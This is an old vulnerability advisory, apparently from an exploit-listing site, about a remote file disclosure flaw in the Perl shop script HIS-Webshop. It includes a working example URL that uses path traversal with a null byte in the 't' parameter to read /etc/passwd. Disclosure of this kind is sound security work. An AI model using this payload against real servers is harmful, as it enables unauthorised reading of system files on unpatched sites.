HIS-Webshop (his-webshop.pl t) Remote File Disclosure Vulnerability

2008-03-24 00:00:00

HIS-Webshop is a shopping-system written in Perl by www.shoppark.de
The script doesn´t check the "t"-parameter.

Example:
http://server.com/cgi-bin/his-webshop.pl?t=../../../../../../../../etc/passwd%00

<< Greetz Zero X >>

#

Fixes

No fixes

In order to submit a new fix you need to be registered.